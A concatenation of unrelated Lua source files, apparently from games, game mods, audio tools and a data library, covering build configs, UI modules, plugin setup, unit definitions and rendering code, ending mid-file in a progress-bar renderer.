x_steps, y_steps, z_steps , target_x, target_z = powerline_movement(origin_x ,origin_y , origin_z)
navigation_to_target(x_steps, y_steps, z_steps,current_orientation)
turtle.placeDown()
powerline_update = "http://127.0.0.1:5000/powerline_update?x="..target_x.."&z="..target_z
http_request = http.get(powerline_update)
current_orientation = calculate_orientation()
x_steps, y_steps, z_steps = calculate_steps(origin_x ,origin_y , origin_z)
navigation_to_target(x_steps, y_steps, z_steps,current_orientation)
os.sleep(2)
end
while true do
powerline_operations()
end
|
Build {
Env = {
CPPDEFS = {
{ "SHARED"; Config = "*-*-*-shared" }
},
},
Units = function ()
local lib_static = StaticLibrary {
Name = "foo_static",
Config = "*-*-*-static",
Sources = { "lib.c" },
}
local lib_shared = SharedLibrary {
Name = "foo_shared",
Config = "*-*-*-shared",
Sources = { "lib.c" },
}
local prog = Program {
Name = "bar",
Depends = { lib_static, lib_shared },
Sources = { "main.c" },
}
Default(prog)
end,
Configs = {
{
Name = "macosx-gcc",
DefaultOnHost = "macosx",
Tools = { "gcc" },
},
{
Name = "linux-gcc",
DefaultOnHost = "linux",
Tools = { "gcc" },
},
{
Name = "win32-msvc",
DefaultOnHost = "windows",
Tools = { "msvc-vs2012" },
},
{
Name = "win32-mingw",
Tools = { "mingw" },
-- Link with the C++ compiler to get the C++ standard library.
ReplaceEnv = {
LD = "$(CXX)",
},
},
},
Variants = { "debug", "release" },
SubVariants = { "static", "shared" },
}
|
include("shared.lua")
function ENT:ApplyNewSize(NewSize)
local Size = self:GetOriginalSize()
local Scale = Vector(1 / Size.x, 1 / Size.y, 1 / Size.z) * NewSize
local Bounds = NewSize * 0.5
self.Matrix = Matrix()
self.Matrix:Scale(Scale)
self:EnableMatrix("RenderMultiply", self.Matrix)
self:PhysicsInitBox(-Bounds, Bounds)
self:SetRenderBounds(-Bounds, Bounds)
self:EnableCustomCollisions(true)
self:SetMoveType(MOVETYPE_NONE)
self:DrawShadow(false)
local PhysObj = self:GetPhysicsObject()
if IsValid(PhysObj) then
PhysObj:EnableMotion(false)
PhysObj:Sleep()
end
end
|
--[[
--=====================================================================================================--
Script Name: Flip a Coin, for SAPP (PC & CE)
Description: A simple addon that lets you flip a text-based virtual coin!
Copyright (c) 2020, Jericho Crosby <jericho.crosby227@gmail.com>
* Notice: You can use this document subject to the following conditions:
https://github.com/Chalwk77/HALO-SCRIPT-PROJECTS/blob/master/LICENSE
--=====================================================================================================--
]]--
-- Config Starts
local flip_command = "flip"
local permission_level = -1
local output = {
"Flipping %flips% times...",
"Heads: %headcount%/%flips% - %percent%%",
"Tails: %tailcount%/%flips% - %percent%%",
"This took %time% seconds"
}
local flips = 100000000
-- Config Ends
local heads, tails = 1, 2
local headcount, tailcount = 0, 0
api_version = "1.12.0.0"
local gmatch, gsub = string.gmatch, string.gsub
function OnScriptLoad()
register_callback(cb["EVENT_COMMAND"], "OnServerCommand")
end
local hasAccess = function(PlayerIndex)
return (tonumber(get_var(PlayerIndex, "$lvl")) >= permission_level)
end
function OnServerCommand(Executor, Command, _, _)
local Args = CmdSplit(Command)
if (Args[1] == nil or Args[1] == "") then
return
elseif (Args[1] == flip_command and Args[2] == nil) and hasAccess(Executor) then
local starttime = os.time()
local Flipping = gsub(output[1], "%%flips%%", flips)
Send(Executor, Flipping)
math.randomseed(os.time())
local x
for i = 1, flips do
x = math.random(2)
if (x == heads) then
headcount = headcount + 1
else
tailcount = tailcount + 1
end
end
local endtime = os.time()
local Heads = gsub(gsub(gsub(output[2],
"%%headcount%%", headcount),
"%%flips%%", flips),
"%%percent%%", (headcount / flips * 100))
Send(Executor, Heads)
local Tails = gsub(gsub(gsub(output[3],
"%%tailcount%%", tailcount),
"%%flips%%", flips),
"%%percent%%", (tailcount / flips * 100))
Send(Executor, Tails)
local TimeLapsed = gsub(output[4], "%%time%%", (endtime - starttime))
Send(Executor, TimeLapsed)
return false
end
end
function OnScriptUnload()
end
function Send(PlayerIndex, Message)
if (PlayerIndex == 0) then
cprint(Message, 2 + 8)
else
rprint(PlayerIndex, Message)
end
end
function CmdSplit(CMD)
local t, i = {}, 1
for Args in gmatch(CMD, "([^%s]+)") do
t[i] = Args
i = i + 1
end
return t
end
|
local _G = getfenv(0)
local AtlasLoot = _G.AtlasLoot
local BonusRoll = {}
AtlasLoot.Addons.BonusRoll = BonusRoll
local QLF = AtlasLoot.GUI.QuickLootFrame
local AL = AtlasLoot.Locales
-- lua
local match = string.match
local tonumber = tonumber
-- DB
-- /run BonusRollFrame_StartBonusRoll(227131, "", 180, 1273)
-- /run BonusRollFrame_StartBonusRoll(190156, "", 180, 738)
-- [BonusRollID] = "tierID:instanceID:encounterID" <- new
-- Use /dump GetJournalInfoForSpellConfirmation(spellID) to get instanceID and encounterID
-- Also look into here for more information: http://www.wowhead.com/spells/name:Bonus+Roll+Prompt
local BONUS_ROLL_IDS = {
-- ## Battle for Azeroth
-- Atal'Dazar
[268472] = "8:968:2082", -- Priestess Alun'za
[268477] = "8:968:2036", -- Vol'kaal
[268479] = "8:968:2083", -- Rezan
[268481] = "8:968:2030", -- Yazma
-- Uldir
-- Azeroth
[275407] = "8:1028:2139", -- T'zane
[275408] = "8:1028:2198", -- Warbringer Yenajz
[275409] = "8:1028:2141", -- Ji'arak
[275411] = "8:1028:2199", -- Azurethos, The Winged Typhoon
[275413] = "8:1028:2210", -- Dunegorger Kraulok
[275414] = "8:1028:2197", -- Hailstone Construct
[275415] = "8:1028:2213", -- Doom's Howl
[275416] = "8:1028:2212", -- The Lion's Roar
-- ### Legion
-- BrokenIsles
[227128] = "7:822:1790", -- Ana-Mouz
[227129] = "7:822:1774", -- Calamir
[227130] = "7:822:1789", -- Drugon the Frostblood
[227131] = "7:822:1795", -- Flotsam
[227132] = "7:822:1770", -- Humongris
[227133] = "7:822:1769", -- Levantus
[227134] = "7:822:1783", -- Na'zak the Fiend
[227135] = "7:822:1749", -- Nithogg
[227136] = "7:822:1763", -- Shar'thos
[227137] = "7:822:1756", -- The Soultakers
[227138] = "7:822:1796", -- Withered J'im
-- Broken Shore
[242970] = "7:822:1883", -- Brutallus
[242971] = "7:822:1884", -- Malificus
[242972] = "7:822:1885", -- Si'vash
[242969] = "7:822:1956", -- Apocron
-- Tomb of Sargeras
[240655] = "7:875:1862", -- Goroth
[240656] = "7:875:1867", -- Demonic Inquisition
[240657] = "7:875:1856", -- Harjatan
[240659] = "7:875:1903", -- Sisters of the Moon
[240658] = "7:875:1861", -- Mistress Sassz'ine
[240660] = "7:875:1896", -- The Desolate Host
[240661] = "7:875:1897", -- Maiden of Vigilance
[240662] = "7:875:1873", -- Fallen Avatar
[240663] = "7:875:1898", -- Kil'jaeden
-- EmeraldNightmare
[221046] = "7:768:1703", -- Nythendra
[221047] = "7:768:1738", -- Il'gynoth, Heart of Corruption
[221048] = "7:768:1744", -- Elerethe Renferal
[221049] = "7:768:1667", -- Ursoc
[221050] = "7:768:1704", -- Dragons of Nightmare
[221052] = "7:768:1750", -- Cenarius
[221053] = "7:768:1726", -- Xavius
-- TheNighthold
[232436] = "7:786:1706", -- Skorpyron
[232437] = "7:786:1725", -- Chronomatic Anomaly
[232438] = "7:786:1731", -- Trilliax
[232439] = "7:786:1751", -- Spellblade Aluriel
[232440] = "7:786:1762", -- Tichondrius
[232441] = "7:786:1713", -- Krosus
[232442] = "7:786:1761", -- High Botanist Tel'arn
[232443] = "7:786:1732", -- Star Augur Etraeus
[232444] = "7:786:1743", -- Grand Magistrix Elisande
[232445] = "7:786:1737", -- Gul'dan
-- TrialOfValor
[232466] = "7:861:1819", -- Odyn
[232467] = "7:861:1830", -- Guarm
[232468] = "7:861:1829", -- Helya
-- Antorus, the Burning Throne
[250588] = "7:946:1992", -- Garothi Worldbreaker
[250598] = "7:946:1987", -- Felhounds of Sargeras
[250600] = "7:946:1997", -- Antoran High Command
[250601] = "7:946:1985", -- Portal Keeper Hasabel
[250602] = "7:946:2025", -- Eonar the Life-Binder
[250603] = "7:946:2009", -- Imonar the Soulhunter
[250604] = "7:946:2004", -- Kin'garoth
[250605] = "7:946:1983", -- Varimathras
[250606] = "7:946:1986", -- The Coven of Shivarra
[250607] = "7:946:1984", -- Aggramar
[250608] = "7:946:2031", -- Argus the Unmaker
-- Invasion Points
[254441] = "7:959:2010", -- Matron Folnuna
[254437] = "7:959:2011", -- Mistress Alluradel
[254435] = "7:959:2012", -- Inquisitor Meto
[254443] = "7:959:2013", -- Occularus
[254446] = "7:959:2014", -- Sotanathor
[254439] = "7:959:2015", -- Pit Lord Vilemus
-- ### WoD
-- BlackrockFoundry
[177529] = "6:457:1161", -- Gruul
[177530] = "6:457:1202", -- Oregorger
[177536] = "6:457:1122", -- Beastlord Darmac
[177534] = "6:457:1123", -- Flamebender Ka'graz
[177533] = "6:457:1155", -- Hans'gar & Franzok
[177537] = "6:457:1147", -- Operator Thogar
[177531] = "6:457:1154", -- Blast Furnace
[177535] = "6:457:1162", -- Kromog
[177538] = "6:457:1203", -- The Iron Maidens
[177539] = "6:457:959", -- Blackhand
-- HellfireCitadel
[188972] = "6:669:1426", -- Mar'tak
[188973] = "6:669:1425", -- Iron Reaver
[188974] = "6:669:1392", -- Kormrok
[188975] = "6:669:1432", -- Council
[188976] = "6:669:1396", -- Kilrogg
[188977] = "6:669:1372", -- Gorefiend
[188978] = "6:669:1433", -- Iskar
[188979] = "6:669:1427", -- Socrethar
[188980] = "6:669:1391", -- Zakuum
[188981] = "6:669:1447", -- Xhulhorac
[188982] = "6:669:1394", -- Velhari
[188983] = "6:669:1395", -- Mannoroth
[188984] = "6:669:1438", -- Archimonde
-- Highmaul
[177521] = "6:477:1128", -- Kargath Bladefist
[177522] = "6:477:971", -- Butcher
[177523] = "6:477:1195", -- Tectus
[177524] = "6:477:1196", -- Brackenspore
[177525] = "6:477:1148", -- Twin Ogron
[177526] = "6:477:1153", -- Ko'ragh
[177528] = "6:477:1197", -- Imperator Mar'gok
-- Draenor
--[[ no longer available
[178847] = "6:557:1291", -- Drov the Ruiner
[178851] = "6:557:1262", -- Rukhmar
[178849] = "6:557:1211", -- Tarlna the Ageless
]]
[188985] = "6:557:1452", -- Supreme Lord Kazzak
-- ### MoP
-- MoguShanVaults
[125144] = "5:317:679", -- The Stone Guard
[132189] = "5:317:689", -- Feng
[132190] = "5:317:685", -- Garajal
[132191] = "5:317:687", -- Spirit Kings
[132192] = "5:317:726", -- Elegon
[132193] = "5:317:677", -- Will of the Emperor
-- HoF
[132194] = "5:330:745", -- Zorlok
[132195] = "5:330:744", -- Tayak
[132196] = "5:330:713", -- Garalon
[132197] = "5:330:741", -- Meljarak
[132198] = "5:330:737", -- Unsok
[132199] = "5:330:743", -- Shekzeer
-- ToES
[132200] = "5:320:683", -- Protectors
[132201] = "5:320:742", -- Tsulong
[132202] = "5:320:729", -- LeiShi
[132203] = "5:320:709", -- ShaofFear
-- ToT
[139674] = "5:362:827", -- Jinrokh
[139677] = "5:362:819", -- Horridon
[139679] = "5:362:816", -- Council
[139680] = "5:362:825", -- Tortos
[139682] = "5:362:821", -- Megaera
[139684] = "5:362:828", -- JiKun
[139686] = "5:362:818", -- Durumu
[139687] = "5:362:820", -- Primordius
[139688] = "5:362:824", -- Dark Animus
[139689] = "5:362:817", -- Iron Qon
[139690] = "5:362:829", -- Twin Consorts
[139691] = "5:362:832", -- Lei Shen
[139692] = "5:362:831", -- Raden
-- SoO
[145909] = "5:369:852", -- Immerseus
[145910] = "5:369:849", -- Fallen Protectors
[145911] = "5:369:866", -- Norushen
[145912] = "5:369:867", -- Sha of Pride
[145913] = "5:369:868", -- Galakras
[145914] = "5:369:864", -- Iron Juggernaut
[145915] = "5:369:856", -- Dark Shaman
[145916] = "5:369:850", -- General Nazgrim
[145917] = "5:369:846", -- Malkorok
[145918] = "5:369:865", -- Siegecrafter Blackfuse
[145919] = "5:369:870", -- Spoils of Pandaria
[145920] = "5:369:851", -- Thok the Bloodthirsty
[145921] = "5:369:853", -- Klaxxi Paragons
[145922] = "5:369:869", -- Garrosh Hellscream
-- Pandaria
[132205] = "5:322:858", -- Sha of Anger
[132206] = "5:322:725", -- Galleon
[136381] = "5:322:814", -- Nalak
[137554] = "5:322:826", -- Oondasta
[148316] = "5:322:861", -- Ordos
[148317] = "5:322:857", -- Celestials ( 857 - ChiJi, 858 - YuLon, 859 - NioZao, 859 - Xuen )
}
local function LoadQuickLootFrame(self)
if AtlasLoot.db.Addons.BonusRoll.enabled and self.spellID and BONUS_ROLL_IDS[self.spellID] then
local tierID, instanceID, encounterID = strsplit(":", BONUS_ROLL_IDS[self.spellID])
QLF:SetEncounterJournalBonusRoll(tonumber(tierID), GetRaidDifficultyID() or 1, tonumber(instanceID), tonumber(encounterID))
end
end
local function ClearQuickLootFrame(self)
if AtlasLoot.db.Addons.BonusRoll.enabled and QLF.frame~=nil then
QLF:Clear()
QLF:Hide()
end
end
BonusRollFrame:HookScript("OnShow", LoadQuickLootFrame)
BonusRollFrame:HookScript("OnHide", ClearQuickLootFrame)
function BonusRoll:Preview(id)
LoadQuickLootFrame({spellID = id or 275409})
end
|
module('love.mouse')
function getCursor() end
function getPosition() end
function getRelativeMode() end
function getSystemCursor() end
function getX() end
function getY() end
function hasCursor() end
function isDown() end
function isGrabbed() end
function isVisible() end
function newCursor() end
function setCursor() end
function setGrabbed() end
function setPosition() end
function setRelativeMode() end
function setVisible() end
function setX() end
function setY() end
|
return function(Modules, ReplicatedModules)
local public = {}
local GameGui
local FocusData = {Enabled = false, TransitionLength = 10, DarkenTransparencyGoal = 0.5, BlurGoal = 20}
local CenterPages = {}
local PageSettings = {}
local CurrentPage = nil
function public.Awake()
GameGui = game.Players.LocalPlayer.PlayerGui:WaitForChild("GameGui")
end
function public.GetGameGui()
repeat wait() until GameGui
return GameGui
end
function public.FocusUIAction()
FocusData.Enabled = true
repeat wait()
GameGui.DarkenBackground.BackgroundTransparency = math.max(GameGui.DarkenBackground.BackgroundTransparency - FocusData.DarkenTransparencyGoal / FocusData.TransitionLength, FocusData.DarkenTransparencyGoal)
game.Lighting.UIBlur.Size = math.min(game.Lighting.UIBlur.Size + FocusData.BlurGoal / FocusData.TransitionLength, FocusData.BlurGoal)
until (GameGui.DarkenBackground.BackgroundTransparency <= FocusData.DarkenTransparencyGoal and game.Lighting.UIBlur.Size >= FocusData.BlurGoal) or not FocusData.Enabled
end
function public.DefocusUIAction()
FocusData.Enabled = false
repeat wait()
GameGui.DarkenBackground.BackgroundTransparency = math.min(GameGui.DarkenBackground.BackgroundTransparency + FocusData.DarkenTransparencyGoal / FocusData.TransitionLength, 1)
game.Lighting.UIBlur.Size = math.max(game.Lighting.UIBlur.Size - FocusData.BlurGoal / FocusData.TransitionLength, 0)
until (GameGui.DarkenBackground.BackgroundTransparency >= 1 and game.Lighting.UIBlur.Size <= 0) or FocusData.Enabled
end
function public.BindPageToButton(tag, button)
button.MouseButton1Click:Connect(function()
public.OpenPage(tag)
end)
end
function public.CreateCenterPage(tag, page, goBackPageTag)
assert(typeof(tag) == "string", "UI Page tag must be a string")
assert(typeof(page) == "Instance" and page:IsA("GuiObject"), "UI Page must be a GuiObject")
CenterPages[tag] = page
if page:FindFirstChild("BackButton") then
page.BackButton.MouseButton1Click:Connect(function()
if goBackPageTag then
public.OpenPage(goBackPageTag)
else
public.ClosePage(tag)
end
end)
end
end
function public.OpenPage(tag)
if CurrentPage and CurrentPage ~= CenterPages[tag] then
CurrentPage:TweenPosition(UDim2.new(0.5, 0, -0.5, 0), Enum.EasingDirection.In, Enum.EasingStyle.Quart, 0.2, true)
end
if CenterPages[tag] then
CurrentPage = CenterPages[tag]
CenterPages[tag]:TweenPosition(UDim2.new(0.5, 0, 0.5, 0), Enum.EasingDirection.Out, Enum.EasingStyle.Back, 0.2, true)
--Modules.GuiLibrary.FocusUIAction()
end
end
function public.ClosePage(tag)
CurrentPage = nil
if tag and CenterPages[tag] then
CenterPages[tag]:TweenPosition(PageSettings[tag] and PageSettings[tag].EndPosition or UDim2.new(0.5, 0, -0.5, 0),
Enum.EasingDirection.In, Enum.EasingStyle.Quart, 0.2, true)
else
for tag, page in pairs(CenterPages) do
page:TweenPosition(PageSettings[tag] and PageSettings[tag].EndPosition or UDim2.new(0.5, 0, -0.5, 0),
Enum.EasingDirection.In, Enum.EasingStyle.Quart, 0.2, true)
end
end
end
function public.SetPageSettings(tag, settingsTable)
assert(CenterPages[tag], "Page doesn't exist")
PageSettings[tag] = settingsTable
end
function public.HideAllPages()
CurrentPage = nil
for tag, page in pairs(CenterPages) do
page:TweenPosition(PageSettings[tag] and PageSettings[tag].EndPosition or UDim2.new(0.5, 0, -0.5, 0),
Enum.EasingDirection.In, Enum.EasingStyle.Quart, 0.2, true)
end
end
function public.CircleIn()
GameGui.CircleZoom:TweenSize(UDim2.new(0, 0, 0, 0), Enum.EasingDirection.Out, Enum.EasingStyle.Quint, 0.7, true)
end
function public.CircleOut()
GameGui.CircleZoom:TweenSize(UDim2.new(1.5, 0, 1.5, 0), Enum.EasingDirection.In, Enum.EasingStyle.Quint, 0.7, true)
end
return public
end
|
-- main.lua
-- Implements the main plugin entrypoint
-- Configuration
-- Use prefixes or not.
-- If set to true, messages are prefixed, e. g. "[FATAL]". If false, messages are colored.
g_UsePrefixes = true
-- Global variables
Messages = {}
WorldsSpawnProtect = {}
WorldsWorldLimit = {}
WorldsWorldDifficulty = {}
lastsender = {}
-- Called by MCServer on plugin start to initialize the plugin
function Initialize(Plugin)
Plugin:SetName( "Core" )
Plugin:SetVersion( 15 )
-- Register for all hooks needed
cPluginManager:AddHook(cPluginManager.HOOK_CHAT, OnChat)
cPluginManager:AddHook(cPluginManager.HOOK_CRAFTING_NO_RECIPE, OnCraftingNoRecipe)
cPluginManager:AddHook(cPluginManager.HOOK_PLAYER_DESTROYED, OnDisconnect);
cPluginManager:AddHook(cPluginManager.HOOK_KILLING, OnKilling)
cPluginManager:AddHook(cPluginManager.HOOK_PLAYER_BREAKING_BLOCK, OnPlayerBreakingBlock)
cPluginManager:AddHook(cPluginManager.HOOK_PLAYER_JOINED, OnPlayerJoined)
cPluginManager:AddHook(cPluginManager.HOOK_PLAYER_MOVING, OnPlayerMoving)
cPluginManager:AddHook(cPluginManager.HOOK_PLAYER_PLACING_BLOCK, OnPlayerPlacingBlock)
cPluginManager:AddHook(cPluginManager.HOOK_SPAWNING_ENTITY, OnSpawningEntity)
cPluginManager:AddHook(cPluginManager.HOOK_TAKE_DAMAGE, OnTakeDamage)
-- Bind ingame commands:
-- Load the InfoReg shared library:
dofile(cPluginManager:GetPluginsPath() .. "/InfoReg.lua")
-- Bind all the commands:
RegisterPluginInfoCommands();
-- Bind all the console commands:
RegisterPluginInfoConsoleCommands();
-- Load settings:
IniFile = cIniFile()
IniFile:ReadFile("settings.ini")
HardCore = IniFile:GetValueSet("GameMode", "Hardcore", "false")
IniFile:WriteFile("settings.ini")
-- Load SpawnProtection and WorldLimit settings for individual worlds:
cRoot:Get():ForEachWorld(
function (a_World)
LoadWorldSettings(a_World)
end
)
-- Initialize the banlist, load its DB, do whatever processing it needs on startup:
InitializeBanlist()
-- Initialize the whitelist, load its DB, do whatever processing it needs on startup:
InitializeWhitelist()
-- Initialize the Item Blacklist (the list of items that cannot be obtained using the give command)
IntializeItemBlacklist( Plugin )
-- Add webadmin tabs:
Plugin:AddWebTab("Manage Server", HandleRequest_ManageServer)
Plugin:AddWebTab("Server Settings", HandleRequest_ServerSettings)
Plugin:AddWebTab("Chat", HandleRequest_Chat)
Plugin:AddWebTab("Players", HandleRequest_Players)
Plugin:AddWebTab("Whitelist", HandleRequest_WhiteList)
Plugin:AddWebTab("Permissions", HandleRequest_Permissions)
Plugin:AddWebTab("Plugins", HandleRequest_ManagePlugins)
Plugin:AddWebTab("Time & Weather", HandleRequest_Weather)
Plugin:AddWebTab("Ranks", HandleRequest_Ranks)
Plugin:AddWebTab("Player Ranks", HandleRequest_PlayerRanks)
LoadMotd()
WEBLOGINFO("Core is initialized")
LOG("Initialised " .. Plugin:GetName() .. " v." .. Plugin:GetVersion())
return true
end
function OnDisable()
LOG( "Disabled Core!" )
end
|
return {
armorbweaver = {
acceleration = 0.15,
activatewhenbuilt = true,
brakerate = 0.45,
buildcostenergy = 1658,
buildcostmetal = 70,
builder = false,
buildpic = "armorbweaver.dds",
buildtime = 5423,
canguard = true,
canmove = true,
canpatrol = true,
canstop = 1,
category = "ALL MOBILE TINY SURFACE UNDERWATER",
corpse = "dead",
defaultmissiontype = "Standby",
description = "All-Terrain Jammer Spider",
energyuse = 35,
explodeas = "BIG_UNITEX",
footprintx = 3,
footprintz = 3,
idleautoheal = 5,
idletime = 1800,
losemitheight = 22,
maneuverleashlength = 640,
mass = 70,
maxdamage = 235,
maxslope = 16,
maxvelocity = 1.15,
maxwaterdepth = 32,
mobilestandorders = 1,
movementclass = "TKBOT3",
name = "Orbweaver",
noautofire = false,
objectname = "armorbweaver",
onoffable = true,
radardistance = 0,
radardistancejam = 450,
radaremitheight = 25,
selfdestructas = "BIG_UNIT",
sightdistance = 225,
standingmoveorder = 1,
steeringmode = 1,
turninplaceanglelimit = 140,
turninplacespeedlimit = 0.759,
turnrate = 950,
unitname = "armorbweaver",
customparams = {
buildpic = "armorbweaver.dds",
faction = "ARM",
},
featuredefs = {
dead = {
blocking = true,
damage = 403,
description = "Orbweaver Wreckage",
featuredead = "heap",
footprintx = 2,
footprintz = 2,
metal = 52,
object = "armorbweaver_dead",
reclaimable = true,
customparams = {
fromunit = 1,
},
},
heap = {
blocking = false,
damage = 504,
description = "Orbweaver Debris",
footprintx = 2,
footprintz = 2,
metal = 28,
object = "2x2a",
reclaimable = true,
customparams = {
fromunit = 1,
},
},
},
sfxtypes = {
pieceexplosiongenerators = {
[1] = "piecetrail0",
[2] = "piecetrail1",
[3] = "piecetrail2",
[4] = "piecetrail3",
[5] = "piecetrail4",
[6] = "piecetrail6",
},
},
sounds = {
canceldestruct = "cancel2",
underattack = "warning1",
cant = {
[1] = "cantdo4",
},
count = {
[1] = "count6",
[2] = "count5",
[3] = "count4",
[4] = "count3",
[5] = "count2",
[6] = "count1",
},
ok = {
[1] = "spider2",
},
select = {
[1] = "radjam4",
},
},
},
}
|
local qconsts = require 'Q/UTILS/lua/qconsts'
local ffi = require 'ffi'
local get_ptr = require 'Q/UTILS/lua/get_ptr'
local cmem = require 'libcmem'
local Scalar = require 'libsclr'
local function mem_initialize(subs)
local hdr = [[
typedef struct _reduce_max_<<qtype>>_args {
<<reduce_ctype>> max_val;
uint64_t num; // number of non-null elements inspected
int64_t max_index;
} REDUCE_max_<<qtype>>_ARGS;
]]
hdr = string.gsub(hdr,"<<qtype>>", subs.qtype)
hdr = string.gsub(hdr,"<<reduce_ctype>>", subs.reduce_ctype)
pcall(ffi.cdef, hdr)
-- Set c_mem using info from args
local rec_type = "REDUCE_max_" .. subs.qtype .. "_ARGS"
local cst_as = rec_type .. " *"
local sz_c_mem = ffi.sizeof(rec_type)
local c_mem = assert(cmem.new(sz_c_mem), "malloc failed")
local c_mem_ptr = get_ptr(c_mem, cst_as)
c_mem_ptr.max_val = qconsts.qtypes[subs.qtype].min
c_mem_ptr.num = 0
c_mem_ptr.max_index = -1
--TODO: is it a right place for getter? check with Ramesh
local getter = function (x)
local y = get_ptr(c_mem, cst_as)
return Scalar.new(x, subs.reduce_qtype),
Scalar.new(tonumber(y[0].num), "I8"), Scalar.new(tonumber(y[0].max_index), "I8")
end
return c_mem, cst_as, getter
end
return mem_initialize
|
--[[
* ReaScript Name: Track Inspector
* Author: Hector Corcin (HeDa)
* Author URI: http://reaper.hector-corcin.com
* Licence: Copyright © 2016-2017, Hector Corcin
]]
instance = 3 -- change to another number in a copy of this file to allow another instance
master_track = false -- (true or false) change to true to always start with master track
sectionname="HeDaTrackInspectorFloating"
open_at_mouse=true
open_at_mouse_position="_BR_MOVE_WINDOW_TO_MOUSE_H_R_V_M"
-----------------------------------------------------------------
local OS = reaper.GetOS()
local mode="x64"
if OS == "Win32" or OS == "OSX32" then mode="x32" end
local info = debug.getinfo(1,'S');
script_path = info.source:match[[^@?(.*[\/])[^\/]-$]]
resourcepath=reaper.GetResourcePath()
scripts_path=resourcepath.."/Scripts/"
hedascripts_path=scripts_path.."HeDaScripts/"
dofile(script_path .. "HTI" .. mode .. ".dat") |
local Pause = {}
local Input = require ("src.boundary.input")
local Palette = require ("src.boundary.palettes")
local Sound = require ("src.boundary.audio.pause")
Pause.OPTIONS = {" palette ", "screen size", " quit "}
Pause.selected = 1
function Pause.update ()
if Input.keyPressed (Input.KEYS.UP) then
Pause.selected = Pause.selected - 1
if Pause.selected < 1 then
Pause.selected = #Pause.OPTIONS
end
Sound.MOVE:play ()
end
if Input.keyPressed (Input.KEYS.DOWN) then
Pause.selected = Pause.selected + 1
if Pause.selected > #Pause.OPTIONS then
Pause.selected = 1
end
Sound.MOVE:play ()
end
end
function Pause.render ()
love.graphics.setColor (Palette [Palette.current] [5])
love.graphics.rectangle ("fill", 5 * 8 - 2, 6, 10 * 8 + 4, 10 * 8 + 4, 8, 8, 2)
love.graphics.setColor (Palette [Palette.current] [1])
love.graphics.rectangle ("fill", 5 * 8, 8, 10 * 8, 10 * 8, 8, 8, 2)
love.graphics.setColor (Palette [Palette.current] [5])
love.graphics.print (" pause ", 6 * 8, 2 * 8)
for i,text in pairs (Pause.OPTIONS) do
if i == Pause.selected then
love.graphics.setColor (Palette [Palette.current] [5])
else
love.graphics.setColor (Palette [Palette.current] [3])
end
if i == 3 then
love.graphics.print (Pause.OPTIONS [i], 6 * 8 + 4, (3 + (i * 2)) * 8)
else
love.graphics.print (Pause.OPTIONS [i], 6 * 8, (3 + (i * 2)) * 8)
end
end
end
return Pause
|
--Dx Functions
local dxDrawLine = dxDrawLine
local dxDrawImage = dxDrawImageExt
local dxDrawImageSection = dxDrawImageSectionExt
local dxDrawText = dxDrawText
local dxGetFontHeight = dxGetFontHeight
local dxDrawRectangle = dxDrawRectangle
local dxSetShaderValue = dxSetShaderValue
local dxGetPixelsSize = dxGetPixelsSize
local dxGetPixelColor = dxGetPixelColor
local dxSetRenderTarget = dxSetRenderTarget
local dxGetTextWidth = dxGetTextWidth
local dxSetBlendMode = dxSetBlendMode
--
local assert = assert
local type = type
local isElement = isElement
ProgressBarShaders = {}
ProgressBarStyle = {
["normal-horizontal"] = function(source,x,y,w,h,bgImage,bgColor,indicatorImage,indicatorColor,indicatorMode,padding,percent,rendSet)
local eleData = dgsElementData[source]
local iPosX,iPosY,iSizX,iSizY = x+padding[1],y+padding[2],w-padding[1]*2,h-padding[2]*2
local iSizXPercent = iSizX*percent
if bgImage then
dxDrawImage(x,y,w,h,bgImage,0,0,0,bgColor,rendSet,rndtgt)
else
dxDrawRectangle(x,y,w,h,bgColor,rendSet)
end
if type(indicatorImage) == "table" then
if type(indicatorColor) ~= "table" then
indicatorColor = {indicatorColor,indicatorColor}
end
if indicatorMode then
local sx,sy = eleData.indicatorUVSize[1],eleData.indicatorUVSize[2]
if not sx or not sy then
sx1,sy1 = dxGetMaterialSize(indicatorImage[1])
sx2,sy2 = dxGetMaterialSize(indicatorImage[2])
else
sx1,sy1,sx2,sy2 = sx,sy,sx,sy
end
dxDrawImageSection(iPosX,iPosY,iSizXPercent,iSizY,0,0,sx1*percent,sy1,indicatorImage[1],0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImageSection(iSizXPercent+iPosX,iPosY,iSizX-iSizXPercent,iSizY,sx2*percent,0,sx2*(1-percent),sy2,indicatorImage[1],0,0,0,indicatorColor[2],rendSet,rndtgt)
else
dxDrawImage(iPosX,iPosY,iSizXPercent,iSizY,indicatorImage[1],0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImage(iSizXPercent+iPosX,iPosY,iSizX-iSizXPercent,iSizY,indicatorImage[2],0,0,0,indicatorColor[2],rendSet,rndtgt)
end
elseif isElement(indicatorImage) then
if type(indicatorColor) == "table" then
if indicatorMode then
local sx,sy = eleData.indicatorUVSize[1],eleData.indicatorUVSize[2]
if not sx or not sy then sx,sy = dxGetMaterialSize(indicatorImage) end
dxDrawImageSection(iPosX,iPosY,iSizXPercent,iSizY,0,0,sx*percent,sy,indicatorImage,0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImageSection(iSizXPercent+iPosX,iPosY,iSizX-iSizXPercent,iSizY,sx*percent,0,sx*(1-percent),sy,indicatorImage,0,0,0,indicatorColor[2],rendSet,rndtgt)
else
dxDrawImage(iPosX,iPosY,iSizXPercent,iSizY,indicatorImage,0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImage(iSizXPercent+iPosX,iPosY,iSizX-iSizXPercent,iSizY,indicatorImage,0,0,0,indicatorColor[2],rendSet,rndtgt)
end
else
if indicatorMode then
local sx,sy = eleData.indicatorUVSize[1],eleData.indicatorUVSize[2]
if not sx or not sy then sx,sy = dxGetMaterialSize(indicatorImage) end
dxDrawImageSection(iPosX,iPosY,iSizXPercent,iSizY,0,0,sx*percent,sy,indicatorImage,0,0,0,indicatorColor,rendSet,rndtgt)
else
dxDrawImage(iPosX,iPosY,iSizXPercent,iSizY,indicatorImage,0,0,0,indicatorColor,rendSet,rndtgt)
end
end
elseif type(indicatorColor) == "table" then
dxDrawRectangle(iPosX,iPosY,iSizXPercent,iSizY,indicatorColor[1],rendSet)
dxDrawRectangle(iSizXPercent+iPosX,iPosY,iSizX-iSizXPercent,iSizY,indicatorColor[2],rendSet)
else
dxDrawRectangle(iPosX,iPosY,iSizXPercent,iSizY,indicatorColor,rendSet)
end
end,
["normal-vertical"] = function(source,x,y,w,h,bgImage,bgColor,indicatorImage,indicatorColor,indicatorMode,padding,percent,rendSet)
